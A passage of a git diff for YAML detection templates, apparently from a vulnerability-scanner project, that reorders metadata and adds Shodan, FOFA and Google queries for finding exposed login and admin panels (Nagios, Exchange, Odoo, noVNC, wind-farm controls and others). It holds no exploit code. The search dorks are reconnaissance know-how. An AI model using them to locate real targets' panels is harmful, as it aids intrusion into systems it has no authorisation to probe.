https://help.ivanti.com/mi/help/en_us/sntry/9.9.0/gdcl/Content/SentryGuide/MobileIron_Sentry_overvi.htm metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:967636089 - verified: true tags: panel,mobileiron http: diff --git a/http/exposed-panels/modoboa-panel.yaml b/http/exposed-panels/modoboa-panel.yaml index 18622fd964..6e83630de5 100644 --- a/http/exposed-panels/modoboa-panel.yaml +++ b/http/exposed-panels/modoboa-panel.yaml @@ -13,11 +13,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:modoboa:*:*:* metadata: - max-request: 2 - product: modoboa - shodan-query: http.favicon.hash:1949005079 - vendor: modoboa verified: true + max-request: 2 + vendor: modoboa + product: modoboa + shodan-query: + - http.favicon.hash:1949005079 + - http.html:"modoboa" + fofa-query: + - body="modoboa" + - icon_hash=1949005079 tags: panel,modoboa,mail http: diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index 824c38fc0f..2d77df6a03 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -7,8 +7,8 @@ info: metadata: verified: true max-request: 1 - fofa-query: icon_hash="-211006074" shodan-query: http.favicon.hash:-211006074 + fofa-query: icon_hash="-211006074" tags: panel,monitorr,detect http: diff --git a/http/exposed-panels/monstra-admin-panel.yaml b/http/exposed-panels/monstra-admin-panel.yaml index a1cfbb7446..1fb2f60be0 100644 --- a/http/exposed-panels/monstra-admin-panel.yaml +++ b/http/exposed-panels/monstra-admin-panel.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: monstra product: monstra_cms shodan-query: http.favicon.hash:419828698 - vendor: monstra - verified: true + fofa-query: icon_hash=419828698 tags: panel,monstra http: diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml index 664ae7c57b..401caa49aa 100644 --- a/http/exposed-panels/moodle-workplace-panel.yaml +++ b/http/exposed-panels/moodle-workplace-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://moodle.com/solutions/workplace/ metadata: + verified: true max-request: 1 shodan-query: http.html:"moodle" - verified: true tags: panel,moodle,login,detect http: diff --git a/http/exposed-panels/movable-type-login.yaml b/http/exposed-panels/movable-type-login.yaml index 5a2c684c1f..604bd7929e 100644 --- a/http/exposed-panels/movable-type-login.yaml +++ b/http/exposed-panels/movable-type-login.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:-:*:*:* metadata: max-request: 2 - product: movable_type - shodan-query: title:"サインイン | Movable Type Pro" vendor: sixapart + product: movable_type + shodan-query: + - title:"サインイン | Movable Type Pro" + - cpe:"cpe:2.3:a:sixapart:movable_type" + - http.title:"サインイン | movable type pro" + fofa-query: title="サインイン | movable type pro" + google-query: intitle:"サインイン | movable type pro" tags: panel,movable,sixapart http: diff --git a/http/exposed-panels/mpftvc-admin-panel.yaml b/http/exposed-panels/mpftvc-admin-panel.yaml index ea4e37d4a5..3a16c48408 100644 --- a/http/exposed-panels/mpftvc-admin-panel.yaml +++ b/http/exposed-panels/mpftvc-admin-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"AdminLogin - MPFTVC" - verified: true tags: panel,mpftvc,admin http: diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml index 9bac4c2874..deca6872b1 100644 --- a/http/exposed-panels/mpsec-isg1000-panel.yaml +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: - fofa-query: 迈普通信技术股份有限公司 - max-request: 1 verified: true + max-request: 1 + fofa-query: 迈普通信技术股份有限公司 tags: panel,login,mpsec,isg1000 http: diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index 2b10435e59..3b158fd34a 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -12,12 +12,19 @@ info: classification: cpe: cpe:2.3:a:microsoft:exchange_server:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: exchange_server - shodan-query: http.favicon.hash:1768726119 - vendor: microsoft verified: true - tags: ms,microsoft,exchange,tech + max-request: 2 + vendor: microsoft + product: "exchange_server" + shodan-query: + - "http.favicon.hash:1768726119" + - http.title:"outlook" + - cpe:"cpe:2.3:a:microsoft:exchange_server" + fofa-query: + - icon_hash=1768726119 + - title="outlook" + google-query: intitle:"outlook" + tags: ms,microsoft,exchange,tech,panel http: - method: GET diff --git a/http/exposed-panels/mspcontrol-login.yaml b/http/exposed-panels/mspcontrol-login.yaml index 922d329190..ec09178e35 100644 --- a/http/exposed-panels/mspcontrol-login.yaml +++ b/http/exposed-panels/mspcontrol-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"MSPControl - Sign In" max-request: 1 shodan-query: http.title:"MSPControl - Sign In" + google-query: intitle:"MSPControl - Sign In" tags: panel,mspcontrol http: diff --git a/http/exposed-panels/mybb-forum-detect.yaml b/http/exposed-panels/mybb-forum-detect.yaml index dcea77b3ba..7929b04261 100644 --- a/http/exposed-panels/mybb-forum-detect.yaml +++ b/http/exposed-panels/mybb-forum-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mybb - shodan-query: http.title:"MyBB" - vendor: mybb verified: true + max-request: 1 + vendor: mybb + product: mybb + shodan-query: + - http.title:"MyBB" + - http.title:"mybb" + fofa-query: title="mybb" + google-query: intitle:"mybb" tags: panel,mybb,forum http: diff --git a/http/exposed-panels/mybb/mybb-forum-install.yaml b/http/exposed-panels/mybb/mybb-forum-install.yaml index 5a196f0c86..94aafb3247 100644 --- a/http/exposed-panels/mybb/mybb-forum-install.yaml +++ b/http/exposed-panels/mybb/mybb-forum-install.yaml @@ -11,11 +11,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:mybb:mybb:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: mybb - shodan-query: http.title:"MyBB" - vendor: mybb verified: true + max-request: 1 + vendor: mybb + product: mybb + shodan-query: + - http.title:"MyBB" + - http.title:"mybb" + fofa-query: title="mybb" + google-query: intitle:"mybb" tags: panel,mybb,forum http: diff --git a/http/exposed-panels/mylittleadmin-panel.yaml b/http/exposed-panels/mylittleadmin-panel.yaml index a3237e9e19..e1d131b6cb 100644 --- a/http/exposed-panels/mylittleadmin-panel.yaml +++ b/http/exposed-panels/mylittleadmin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"myLittleAdmin" - verified: true tags: panel,mylittleadmin,login http: diff --git a/http/exposed-panels/mylittlebackup-panel.yaml b/http/exposed-panels/mylittlebackup-panel.yaml index 8ec72eb852..e9d54daae3 100644 --- a/http/exposed-panels/mylittlebackup-panel.yaml +++ b/http/exposed-panels/mylittlebackup-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 3 shodan-query: http.html:"myLittleBackup" - verified: true tags: panel,mylittlebackup http: diff --git a/http/exposed-panels/mystrom-panel.yaml b/http/exposed-panels/mystrom-panel.yaml index 0d6189c806..600dea0694 100644 --- a/http/exposed-panels/mystrom-panel.yaml +++ b/http/exposed-panels/mystrom-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"myStrom" - verified: true tags: panel,mystrom,iot http: diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 624de3d45d..88df986fe8 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -1,19 +1,19 @@ id: n8n-panel -info: - name: n8n Panel - Detect - author: userdehghani - severity: info - description: | - The worlds most popular workflow automation platform for technical teams - reference: - - https://n8n.io/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:-831756631 - tags: panel,n8n,login,detect - +info: + name: n8n Panel - Detect + author: userdehghani + severity: info + description: | + The worlds most popular workflow automation platform for technical teams + reference: + - https://n8n.io/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-831756631 + tags: panel,n8n,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/nagios-panel.yaml b/http/exposed-panels/nagios-panel.yaml index cee463eb8d..04926813ba 100644 --- a/http/exposed-panels/nagios-panel.yaml +++ b/http/exposed-panels/nagios-panel.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagios:nagios:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 2 + vendor: nagios product: nagios shodan-query: http.title:"nagios" - vendor: nagios - verified: true + fofa-query: title="nagios" + google-query: intitle:"nagios" tags: panel,nagios http: diff --git a/http/exposed-panels/nagios-xi-panel.yaml b/http/exposed-panels/nagios-xi-panel.yaml index f01ff51d81..407b183783 100644 --- a/http/exposed-panels/nagios-xi-panel.yaml +++ b/http/exposed-panels/nagios-xi-panel.yaml @@ -10,11 +10,17 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nagios_xi - shodan-query: http.title:"Nagios XI" - vendor: nagios verified: true + max-request: 2 + vendor: nagios + product: nagios_xi + shodan-query: + - http.title:"Nagios XI" + - http.title:"nagios xi" + fofa-query: + - title="nagios xi" + - app="nagios-xi" + google-query: intitle:"nagios xi" tags: panel,nagios,nagios-xi http: diff --git a/http/exposed-panels/nagvis-panel.yaml b/http/exposed-panels/nagvis-panel.yaml index 08c25860be..834bb14266 100644 --- a/http/exposed-panels/nagvis-panel.yaml +++ b/http/exposed-panels/nagvis-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nagvis:nagvis:*:*:*:*:nagios_xi:*:*:* metadata: - max-request: 2 - product: nagvis - shodan-query: http.html:"NagVis" - vendor: nagvis verified: true + max-request: 2 + vendor: nagvis + product: nagvis + shodan-query: + - http.html:"NagVis" + - http.html:"nagvis" + fofa-query: body="nagvis" tags: panel,nagvis http: diff --git a/http/exposed-panels/navicat-server-panel.yaml b/http/exposed-panels/navicat-server-panel.yaml index bd70ad4dca..8c559d9eda 100644 --- a/http/exposed-panels/navicat-server-panel.yaml +++ b/http/exposed-panels/navicat-server-panel.yaml @@ -7,10 +7,10 @@ info: description: | Navicat On-Prem Server is an on-premise solution that provides you with the option to host a cloud environment for storing Navicat objects internally at your location. In our On-Prem environment, you can enjoy complete control over your system and maintain 100% privacy. It is secure and reliable that allow you to maintain a level of control that the cloud often cannot. metadata: - fofa-query: icon_hash="598296063" + verified: true max-request: 2 shodan-query: http.favicon.hash:598296063 - verified: true + fofa-query: icon_hash="598296063" tags: panel,navicat,on-prem,detect http: diff --git a/http/exposed-panels/ncentral-panel.yaml b/http/exposed-panels/ncentral-panel.yaml index da3aa0895b..618b1a49b0 100644 --- a/http/exposed-panels/ncentral-panel.yaml +++ b/http/exposed-panels/ncentral-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"N-central Login" - verified: true tags: panel,n-central http: diff --git a/http/exposed-panels/nconf-panel.yaml b/http/exposed-panels/nconf-panel.yaml index 4daf13fbc9..2b6ea83d55 100644 --- a/http/exposed-panels/nconf-panel.yaml +++ b/http/exposed-panels/nconf-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"nconf" - verified: true tags: panel,nconf http: diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index aaf0bee5cf..6c4d500a38 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:neo4j:neo4j:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: neo4j - shodan-query: http.title:"Neo4j Browser" vendor: neo4j + product: neo4j + shodan-query: + - http.title:"Neo4j Browser" + - http.title:"neo4j browser" + fofa-query: title="neo4j browser" + google-query: intitle:"neo4j browser" tags: neo4j,exposure,unauth,panel http: diff --git a/http/exposed-panels/neobox-panel.yaml b/http/exposed-panels/neobox-panel.yaml index a0e3b76d90..94b83fea98 100644 --- a/http/exposed-panels/neobox-panel.yaml +++ b/http/exposed-panels/neobox-panel.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="neobox-Web-Server" + verified: true max-request: 1 shodan-query: http.html:"NeoboxUI" - verified: true + fofa-query: app="neobox-Web-Server" tags: panel,neobox,webserver http: diff --git a/http/exposed-panels/neocase-hrportal-panel.yaml b/http/exposed-panels/neocase-hrportal-panel.yaml index c23e7c9e89..7a73044b1d 100644 --- a/http/exposed-panels/neocase-hrportal-panel.yaml +++ b/http/exposed-panels/neocase-hrportal-panel.yaml @@ -10,8 +10,8 @@ info: - https://www.neocasesoftware.com/neocase-hr-solution/ - https://www.neocasesoftware.com/self-service-portal-module/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,neocase,login,detect http: diff --git a/http/exposed-panels/nessus-panel.yaml b/http/exposed-panels/nessus-panel.yaml index 588f857b3c..345df8aab6 100644 --- a/http/exposed-panels/nessus-panel.yaml +++ b/http/exposed-panels/nessus-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: nessus - shodan-query: title:"Nessus" - vendor: tenable verified: true + max-request: 2 + vendor: tenable + product: nessus + shodan-query: + - title:"Nessus" + - http.title:"nessus" + fofa-query: title="nessus" + google-query: intitle:"nessus" tags: panel,nessus,tenable http: diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index a5a83daaa3..d0556067eb 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -11,9 +11,14 @@ info: cpe: cpe:2.3:a:netdata:netdata:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netdata - shodan-query: 'Server: NetData Embedded HTTP Server' vendor: netdata + product: netdata + shodan-query: + - 'Server: NetData Embedded HTTP Server' + - http.title:"netdata dashboard" + - "server: netdata embedded http server" + fofa-query: title="netdata dashboard" + google-query: intitle:"netdata dashboard" tags: netdata,panel,tech http: diff --git a/http/exposed-panels/netdata-panel.yaml b/http/exposed-panels/netdata-panel.yaml index 26798b2611..d5b705b389 100644 --- a/http/exposed-panels/netdata-panel.yaml +++ b/http/exposed-panels/netdata-panel.yaml @@ -14,9 +14,13 @@ info: cpe: cpe:2.3:a:netdata:netdata:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netdata - shodan-query: http.title:"netdata dashboard" vendor: netdata + product: netdata + shodan-query: + - http.title:"netdata dashboard" + - "server: netdata embedded http server" + fofa-query: title="netdata dashboard" + google-query: intitle:"netdata dashboard" tags: panel,netdata http: diff --git a/http/exposed-panels/netflix-conductor-ui.yaml b/http/exposed-panels/netflix-conductor-ui.yaml index 0462ba72f9..1b24a608ec 100644 --- a/http/exposed-panels/netflix-conductor-ui.yaml +++ b/http/exposed-panels/netflix-conductor-ui.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:netflix:conductor:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: conductor - shodan-query: http.title:"Conductor UI", http.title:"Workflow UI" vendor: netflix + product: conductor + shodan-query: + - http.title:"Conductor UI", http.title:"Workflow UI" + - http.title:"conductor ui", http.title:"workflow ui" + fofa-query: title="conductor ui", http.title:"workflow ui" + google-query: intitle:"conductor ui", http.title:"workflow ui" tags: webserver,netflix,conductor,panel http: diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 7d995d74b9..3183b8cc23 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:citrix:netscaler:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netscaler vendor: citrix + product: netscaler tags: panel,netscaler,login,edb,citrix,detect http: diff --git a/http/exposed-panels/netscaler-gateway.yaml b/http/exposed-panels/netscaler-gateway.yaml index cd5bb833e0..95aac8af1e 100644 --- a/http/exposed-panels/netscaler-gateway.yaml +++ b/http/exposed-panels/netscaler-gateway.yaml @@ -5,16 +5,16 @@ info: author: joeldeleep severity: info description: Citrix NetScaler is an application delivery controller that improves the delivery speed and quality of applications to an end user. + remediation: Ensure proper access. reference: - https://stack.watch/product/citrix/netscaler-gateway/ - remediation: Ensure proper access. classification: cwe-id: CWE-200 cpe: cpe:2.3:a:citrix:netscaler_gateway:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netscaler_gateway vendor: citrix + product: netscaler_gateway tags: panel,netscaler,citrix http: diff --git a/http/exposed-panels/netsparker-panel.yaml b/http/exposed-panels/netsparker-panel.yaml index 3880f122f5..ef3ab1d1d3 100644 --- a/http/exposed-panels/netsparker-panel.yaml +++ b/http/exposed-panels/netsparker-panel.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Sign in to Netsparker Enterprise" - verified: true tags: panel,netsparker http: diff --git a/http/exposed-panels/nexus-panel.yaml b/http/exposed-panels/nexus-panel.yaml index 2d0faf7e38..2496d2bc4a 100644 --- a/http/exposed-panels/nexus-panel.yaml +++ b/http/exposed-panels/nexus-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.sonatype.com/products/sonatype-nexus-repository metadata: + verified: true max-request: 1 shodan-query: http.title:"Sonatype Nexus Repository" - verified: true tags: panel,nexus,login,detect http: diff --git a/http/exposed-panels/nginx-admin-panel.yaml b/http/exposed-panels/nginx-admin-panel.yaml index 43dcf7b921..ccdddd90ad 100644 --- a/http/exposed-panels/nginx-admin-panel.yaml +++ b/http/exposed-panels/nginx-admin-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"nginx admin manager" - verified: true tags: panel,nginx,admin http: diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index 79966ae719..339c74d795 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nginx - shodan-query: http.title:"nginx ui" - vendor: f5 verified: true + max-request: 1 + vendor: f5 + product: nginx + shodan-query: + - http.title:"nginx ui" + - cpe:"cpe:2.3:a:f5:nginx" + fofa-query: title="nginx ui" + google-query: intitle:"nginx ui" tags: panel,nginx,exposure,f5 http: diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 14b35e026c..d23fbed5f2 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -1,20 +1,20 @@ id: nocodb-panel -info: - name: NocoDB Panel - Detect - author: userdehghani - severity: info - description: | - NocoDB Login panel was discovered. - reference: - - https://www.nocodb.com/ - - https://docs.nocodb.com/ - metadata: - verified: true - max-request: 1 - shodan-query: http.favicon.hash:206985584 - tags: panel,nocodb,login,detect - +info: + name: NocoDB Panel - Detect + author: userdehghani + severity: info + description: | + NocoDB Login panel was discovered. + reference: + - https://www.nocodb.com/ + - https://docs.nocodb.com/ + metadata: + verified: true + max-request: 2 + shodan-query: "http.favicon.hash:206985584" + tags: panel,nocodb,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/noescape-login.yaml b/http/exposed-panels/noescape-login.yaml index a9905cdc35..c60b13b383 100644 --- a/http/exposed-panels/noescape-login.yaml +++ b/http/exposed-panels/noescape-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NoEscape - Login" - verified: true tags: panel,noescape http: diff --git a/http/exposed-panels/nordex-wind-farm-portal.yaml b/http/exposed-panels/nordex-wind-farm-portal.yaml index ecf2b77d53..29e274e6a9 100644 --- a/http/exposed-panels/nordex-wind-farm-portal.yaml +++ b/http/exposed-panels/nordex-wind-farm-portal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Nordex Control" - verified: true tags: panel,nordex,iot http: diff --git a/http/exposed-panels/normhost-backup-server-manager.yaml b/http/exposed-panels/normhost-backup-server-manager.yaml index 1c0cf7f445..ac4ce40dbe 100644 --- a/http/exposed-panels/normhost-backup-server-manager.yaml +++ b/http/exposed-panels/normhost-backup-server-manager.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Normhost Backup server manager" - verified: true tags: panel,normhost http: diff --git a/http/exposed-panels/novnc-login-panel.yaml b/http/exposed-panels/novnc-login-panel.yaml index a911a38285..99ba4c734a 100644 --- a/http/exposed-panels/novnc-login-panel.yaml +++ b/http/exposed-panels/novnc-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"noVNC" - verified: true tags: panel,novnc http: diff --git a/http/exposed-panels/nozomi-panel.yaml b/http/exposed-panels/nozomi-panel.yaml index 5559224113..f0257dd0e0 100644 --- a/http/exposed-panels/nozomi-panel.yaml +++ b/http/exposed-panels/nozomi-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Please Login | Nozomi Networks Console" - verified: true tags: panel,nozomi http: diff --git a/http/exposed-panels/np-data-cache.yaml b/http/exposed-panels/np-data-cache.yaml index 18f3f2d729..5b4ecbfda6 100644 --- a/http/exposed-panels/np-data-cache.yaml +++ b/http/exposed-panels/np-data-cache.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NP Data Cache" - verified: true tags: np,panel,cache http: diff --git a/http/exposed-panels/nport-web-console.yaml b/http/exposed-panels/nport-web-console.yaml index 2b5dccb466..ab4a7e8b49 100644 --- a/http/exposed-panels/nport-web-console.yaml +++ b/http/exposed-panels/nport-web-console.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"NPort Web Console" - verified: true tags: panel,nport http: diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 49402edaa0..3f92170ef1 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -12,9 +12,9 @@ info: cvss-score: 6.5 cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"nsqadmin" - verified: true tags: nsq,admin,panel,exposure http: diff --git a/http/exposed-panels/nuxeo-platform-panel.yaml b/http/exposed-panels/nuxeo-platform-panel.yaml index c4c52499a8..c85557eb25 100644 --- a/http/exposed-panels/nuxeo-platform-panel.yaml +++ b/http/exposed-panels/nuxeo-platform-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Nuxeo Platform" - verified: true tags: panel,nuxeo http: diff --git a/http/exposed-panels/nzbget-panel.yaml b/http/exposed-panels/nzbget-panel.yaml index 547d74dc37..91b3924797 100644 --- a/http/exposed-panels/nzbget-panel.yaml +++ b/http/exposed-panels/nzbget-panel.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:nzbget:nzbget:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nzbget - shodan-query: html:"NZBGet" - vendor: nzbget verified: true + max-request: 1 + vendor: nzbget + product: nzbget + shodan-query: + - html:"NZBGet" + - http.html:"nzbget" + fofa-query: body="nzbget" tags: panel,nzbget http: diff --git a/http/exposed-panels/o2-easy-panel.yaml b/http/exposed-panels/o2-easy-panel.yaml index eca156b9d7..fd9af7d682 100644 --- a/http/exposed-panels/o2-easy-panel.yaml +++ b/http/exposed-panels/o2-easy-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"O2 Easy Setup" - verified: true tags: panel,o2,easy,iot,router http: diff --git a/http/exposed-panels/ocomon-panel.yaml b/http/exposed-panels/ocomon-panel.yaml index c98a952b9f..386a875530 100644 --- a/http/exposed-panels/ocomon-panel.yaml +++ b/http/exposed-panels/ocomon-panel.yaml @@ -12,11 +12,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:ocomon_project:ocomon:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: ocomon - shodan-query: http.html:"OcoMon" - vendor: ocomon_project verified: true + max-request: 1 + vendor: ocomon_project + product: ocomon + shodan-query: + - http.html:"OcoMon" + - http.html:"ocomon" + fofa-query: body="ocomon" tags: panel,ocomon,oss,ocomon_project http: diff --git a/http/exposed-panels/ocs-inventory-login.yaml b/http/exposed-panels/ocs-inventory-login.yaml index e1294b35c5..37fc467a36 100644 --- a/http/exposed-panels/ocs-inventory-login.yaml +++ b/http/exposed-panels/ocs-inventory-login.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="OCS Inventory" + verified: true max-request: 2 shodan-query: title:"OCS Inventory" - verified: true + fofa-query: title="OCS Inventory" tags: ocs-inventory,panel http: diff --git a/http/exposed-panels/octoprint-login.yaml b/http/exposed-panels/octoprint-login.yaml index d99e3d02c2..a6ad7c5757 100644 --- a/http/exposed-panels/octoprint-login.yaml +++ b/http/exposed-panels/octoprint-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: octoprint vendor: octoprint + product: octoprint tags: octoprint,panel http: diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml index 0107811c52..e5b2df0adb 100644 --- a/http/exposed-panels/odoo-database-manager.yaml +++ b/http/exposed-panels/odoo-database-manager.yaml @@ -8,11 +8,16 @@ info: classification: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: odoo - shodan-query: title:"Odoo" - vendor: odoo verified: true + max-request: 1 + vendor: odoo + product: odoo + shodan-query: + - title:"Odoo" + - http.title:"odoo" + - cpe:"cpe:2.3:a:odoo:odoo" + fofa-query: title="odoo" + google-query: intitle:"odoo" tags: panel,odoo,backup http: diff --git a/http/exposed-panels/odoo-panel.yaml b/http/exposed-panels/odoo-panel.yaml index 401ea9b455..5f87431fda 100644 --- a/http/exposed-panels/odoo-panel.yaml +++ b/http/exposed-panels/odoo-panel.yaml @@ -7,11 +7,16 @@ info: classification: cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: odoo - shodan-query: title:"Odoo" - 